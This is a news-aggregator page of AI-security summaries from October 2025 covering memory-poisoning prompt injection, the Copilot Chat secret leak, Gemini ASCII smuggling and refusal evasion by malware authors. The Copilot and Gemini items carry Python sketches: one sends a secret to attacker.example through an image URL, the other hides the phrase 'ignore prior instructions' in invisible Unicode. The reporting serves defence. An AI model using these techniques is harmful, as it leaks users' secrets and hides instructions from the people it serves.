All news with the #ai security tag

Thu, October 9, 2025

Indirect Prompt Injection Poisons Agents' Long-Term Memory

⚠️ This Unit 42 proof-of-concept shows how an attacker can use indirect prompt injection to silently poison an AI agent’s long-term memory, demonstrated against a travel assistant built on Amazon Bedrock. The attack manipulates the agent’s session summarization process so malicious instructions become stored memory and persist across sessions. When the compromised memory is later injected into orchestration prompts, the agent can be coerced into unauthorized actions such as stealthy exfiltration. Unit 42 outlines layered mitigations including pre-processing prompts, Bedrock Guardrails, content filtering, URL allowlisting, and logging to reduce risk.

read more →

Thu, October 9, 2025

From HealthKick to GOVERSHELL: UTA0388's Malware Evolution

🔎 Volexity attributes a series of tailored spear‑phishing campaigns to a China‑aligned actor tracked as UTA0388, which delivers a Go-based implant named GOVERSHELL. The waves used multilingual, persona-driven lures and legitimate cloud hosting (Netlify, Sync, OneDrive) to stage ZIP/RAR archives that deploy DLL side‑loading and a persistent backdoor. As many as five GOVERSHELL variants emerged between April and September 2025, succeeding an earlier C++ family called HealthKick. Volexity also observed the actor abusing LLMs such as ChatGPT to craft phishing content and automate workflows.

read more →

Thu, October 9, 2025

Securing Agentic AI: Microsoft Ignite Security Guide

🔒 Microsoft Ignite 2025 highlights security-focused sessions and hands-on labs tailored for practitioners and leaders. Join in San Francisco Nov 17–21 (or online Nov 18–20) for briefings, demos, and instructor-led labs covering Microsoft Security Copilot, Sentinel, Defender, Entra, and Purview. A Security Forum (Nov 17) and keynote segments led by senior security executives will explore designing, governing, and protecting agentic AI across the lifecycle.

read more →

Thu, October 9, 2025

Closing the Cloud Security Gap: Key Findings 2025 Report

🔒 The 2025 Unit 42 Global Incident Response Report shows that nearly a third of incidents investigated in 2024 were cloud-related, with 21% of cases directly impacting cloud assets. The article stresses the importance of the shared responsibility model and full, dynamic visibility to manage resource sprawl, misconfigurations and complex cloud-native architectures. It highlights identity misuse and overpermissioned accounts as frequent attack vectors and urges least privilege, credential rotation and robust logging. Palo Alto Networks recommends unified posture and response through Cortex Cloud and integration with Cortex XSIAM to reduce noise and automate remediation.

read more →

Thu, October 9, 2025

Microsoft Expands Azure Datacenters and AI in Asia

☁️ Microsoft is expanding its Azure footprint across Asia, launching new datacenter regions in Malaysia and Indonesia in 2025 and announcing planned expansions in India and Taiwan for 2026. The company is investing billions to deliver AI-ready hyperscale infrastructure, next‑generation networking, scalable storage, and multi‑zone availability to support low-latency, compliant services. Microsoft also plans a second Malaysia region (Southeast Asia 3) and recommends multi-region architectures along with the Cloud Adoption and Well‑Architected Frameworks to improve resilience, performance, and cost optimization.

read more →

Thu, October 9, 2025

Researchers Identify Architectural Flaws in AI Browsers

🔒 A new SquareX Labs report warns that integrating AI assistants into browsers—exemplified by Perplexity’s Comet—introduces architectural security gaps that can enable phishing, prompt injection, malicious downloads and misuse of trusted apps. The researchers flag risks from autonomous agent behavior and limited visibility in SASE and EDR tools. They recommend agentic identity, in-browser DLP, client-side file scanning and extension risk assessments, and urge collaboration among browser vendors, enterprises and security vendors to build protections into these platforms.

read more →

Thu, October 9, 2025

September 2025 Cyber Threats: Ransomware and GenAI Rise

🔍 In September 2025, global cyber-attack volumes eased modestly: organizations faced an average of 1,900 attacks per week, a 4% decline from August but a 1% increase year-over-year. Beneath this apparent stabilization, ransomware activity jumped sharply (up 46%), while emerging GenAI-related data risks expanded rapidly, changing attacker tactics. The report warns that evolving techniques and heightened data exposure are creating a more complex and consequential threat environment for organizations worldwide.

read more →

Thu, October 9, 2025

ThreatsDay: Teams Abuse, MFA Hijack, $2B Crypto Heist

🛡️ Microsoft and researchers report threat actors abusing Microsoft Teams for extortion, social engineering, and financial theft after hijacking MFA with social engineering resets. Separate campaigns use malicious .LNK files to deliver PowerShell droppers and DLL implants that establish persistent command-and-control. Analysts also link over $2 billion in 2025 crypto thefts to North Korean‑linked groups and identify AI-driven disinformation, IoT flaws, and cloud misconfigurations as multiplying risk. Defenders are urged to harden identity, secure endpoints and apps, patch exposed services, and limit long-lived cloud credentials.

read more →

Thu, October 9, 2025

UK Upper Tribunal Upholds ICO Claim Against Clearview

🔍 The UK Information Commissioner’s Office (ICO) won an Upper Tribunal ruling that bolsters its authority to enforce the UK GDPR against Clearview AI and increases the likelihood of a previously issued £7.5m penalty being upheld. The tribunal found that Clearview’s scraping and global database usage involved monitoring the behavior of UK residents and is not beyond the reach of UK law even when services are provided to foreign law‑enforcement customers. The Upper Tribunal has directed the First‑Tier Tribunal to reconsider its earlier decision in light of this jurisdictional clarity, though Clearview may still appeal.

read more →

Thu, October 9, 2025

AI-Powered Cyberattacks Escalate Against Ukraine in 2025

🔍 Ukraine's SSSCIP reported a sharp rise in AI-enabled cyber operations in H1 2025, documenting 3,018 incidents versus 2,575 in H2 2024. Analysts found evidence that attackers used AI not only to craft phishing lures but also to generate malware samples, including a PowerShell stealer identified as WRECKSTEEL. Multiple UAC clusters—such as UAC-0219, UAC-0218, and UAC-0226—deployed stealers and backdoors via booby-trapped archives, SVG attachments, and ClickFix-style tactics. The report also details zero-click exploitation of Roundcube and Zimbra flaws and widespread abuse of legitimate cloud and collaboration services for hosting and data exfiltration.

read more →

Thu, October 9, 2025

CISOs Seek Greater Data Visibility Across Hybrid Clouds

🔍 A majority of CISOs want full visibility into data flows across hybrid cloud environments but often lack suitable tooling. The Gigamon study CISO Insights: Recalibrating Risk in the Age of AI, surveying 1,021 security and IT leaders including 200 CISOs in early 2025, reports that network data volumes have nearly doubled due to AI and that 86% favor combining packet data with metadata. However, 97% admit they must compromise on visibility into their environments, and many distrust public cloud security.

read more →

Wed, October 8, 2025

GitHub Copilot Chat prompt injection exposed secrets

🔐 GitHub Copilot Chat was tricked into leaking secrets from private repositories through hidden comments in pull requests, researchers found. Legit Security researcher Omer Mayraz reported a combined CSP bypass and remote prompt injection that used image rendering to exfiltrate AWS keys. GitHub mitigated the issue in August by disabling image rendering in Copilot Chat, but the case underscores risks when AI assistants access external tools and repository content.
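The exfiltration mechanism described above can be sketched in a few lines: if an assistant renders attacker-supplied markdown, a secret pulled from repository context can leak as a URL parameter when the "image" is fetched. This is an illustrative Python sketch only; the domain, parameter name, and key value are hypothetical, not those from the actual report.

```python
# Illustrative sketch of exfiltration via markdown image rendering:
# the secret rides out in the query string of an image URL that the
# chat UI fetches automatically when it renders the response.
from urllib.parse import quote

def exfil_image_markdown(secret: str,
                         collector: str = "https://attacker.example/pixel.png") -> str:
    """Build a markdown image tag whose URL leaks `secret` when fetched."""
    return f"![x]({collector}?d={quote(secret)})"

tag = exfil_image_markdown("AKIA_EXAMPLE_KEY")
print(tag)  # ![x](https://attacker.example/pixel.png?d=AKIA_EXAMPLE_KEY)
```

Disabling image rendering, as GitHub did, breaks exactly this channel: the markdown is never turned into an outbound request.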

read more →

Wed, October 8, 2025

Security firm urges disconnecting Gemini from Workspace

⚠️ FireTail warns that Google Gemini can be tricked by hidden ASCII control characters — a technique the firm calls ASCII Smuggling — allowing covert prompts to reach the model while remaining invisible in the UI. The researchers say the flaw is especially dangerous when Gemini is given automatic access to Gmail and Google Calendar, because hidden instructions can alter appointments or instruct the agent to harvest sensitive inbox data. FireTail recommends disabling automatic email and calendar processing, constraining LLM actions, and monitoring responses while integrations are reviewed.

read more →

Wed, October 8, 2025

AI-Powered Cloud Alert Investigation with FortiCNAPP

🔎 FortiCNAPP consolidates related cloud signals into composite alerts, reducing noise and prioritizing high-confidence incidents so SOC teams can focus on what matters. Its Observation Timeline sequences logins, API calls, commands, and network traffic into a single, evidence-backed storyline. An AI Alert Assistant supports natural-language queries and returns structured answers, visual relationships, and prioritized remediation steps to accelerate containment and help junior analysts act confidently.

read more →

Wed, October 8, 2025

Salesforce launches AI security and compliance agents

🔒 Salesforce introduced two AI agents on its Agentforce platform that monitor security activity and streamline compliance workflows for the Security Center and Privacy Center. The security agent analyzes event logs to detect anomalous behavior, accelerates investigations by assembling context and remediation plans, and can autonomously freeze or isolate suspicious accounts when authorized. The privacy agent maps metadata and policies against frameworks like GDPR and CCPA, surfaces exposures, and can reclassify or apply erasure policies to reduce compliance risk.

read more →

Wed, October 8, 2025

OpenAI Disrupts Malware Abuse by Russian, DPRK, China

🛡️ OpenAI said it disrupted three clusters that misused ChatGPT to assist malware development, including Russian-language actors refining a RAT and credential stealer, North Korean operators tied to Xeno RAT campaigns, and Chinese-linked accounts targeting semiconductor firms. The company also blocked accounts used for scams, influence operations, and surveillance assistance and said actors worked around direct refusals by composing building-block code. OpenAI emphasized that models often declined explicit malicious prompts and that many outputs were not inherently harmful on their own.

read more →

Wed, October 8, 2025

Autonomous AI Hacking: How Agents Will Reshape Cybersecurity

⚠️ AI agents are increasingly automating cyberattacks, performing reconnaissance, exploitation, and data theft at machine speed and scale. Recent examples include XBOW's mass vulnerability reports, DARPA teams finding dozens of flaws in hours, and reports of adversaries using Claude and HexStrike-AI to orchestrate ransomware and persistent intrusions. This shift threatens to accelerate attacks beyond traditional patch cycles while opening new defensive opportunities such as AI-assisted vulnerability discovery, VulnOps, and even self-healing networks.

read more →

Tue, October 7, 2025

Google won’t fix new ASCII smuggling attack in Gemini

⚠️ Google has declined to patch a new ASCII smuggling vulnerability in Gemini, a technique that embeds invisible characters from the Unicode Tags block to hide instructions from users while still being processed by LLMs. Researcher Viktor Markopoulos of FireTail demonstrated hidden payloads delivered via Calendar invites, emails, and web content that can alter model behavior, spoof identities, or extract sensitive data. Google said the issue is primarily social engineering rather than a security bug.
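The Unicode Tags trick works by shifting printable ASCII into the Tags block (U+E0000–U+E007F), whose characters most UIs render as nothing while tokenizers may still pass them to the model. A minimal round-trip sketch, assuming only the standard mapping between ASCII and the Tags block:

```python
# ASCII smuggling sketch: map printable ASCII (0x20-0x7E) into the
# invisible Unicode Tags block by adding 0xE0000 to each code point.
# The payload displays as nothing in most UIs but survives copy/paste.

def smuggle(text: str) -> str:
    """Encode printable ASCII as invisible Tag characters."""
    return "".join(chr(0xE0000 + ord(c)) for c in text if 0x20 <= ord(c) <= 0x7E)

def reveal(hidden: str) -> str:
    """Decode Tag characters back to visible ASCII."""
    return "".join(chr(ord(c) - 0xE0000) for c in hidden if 0xE0020 <= ord(c) <= 0xE007E)

payload = smuggle("ignore prior instructions")
assert payload != "ignore prior instructions"   # visually empty, but not empty
print(reveal(payload))  # ignore prior instructions
```

Stripping or normalizing characters in this range before they reach the model is the corresponding defensive filter.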

read more →

Tue, October 7, 2025

Google DeepMind's CodeMender Automatically Patches Code

🛠️ Google’s DeepMind unveiled CodeMender, an AI agent that automatically detects, patches, and rewrites vulnerable code to remediate existing flaws and prevent future classes of vulnerabilities. Backed by Gemini Deep Think models and an LLM-based critique tool, it validates changes to reduce regressions and self-correct as needed. DeepMind says it has upstreamed 72 fixes to open-source projects so far and will engage maintainers for feedback to improve adoption and trust.

read more →

Tue, October 7, 2025

AI-Powered Breach and Attack Simulation for Validation

🔍 AI-powered Breach and Attack Simulation (BAS) converts the flood of threat intelligence into safe, repeatable tests that validate defenses across real environments. The article argues that integrating AI with BAS lets teams operationalize new reports in hours instead of weeks, delivering on-demand validation, clearer risk prioritization, measurable ROI, and board-ready assurance. Picus Security positions this approach as a practical step-change for security validation.

read more →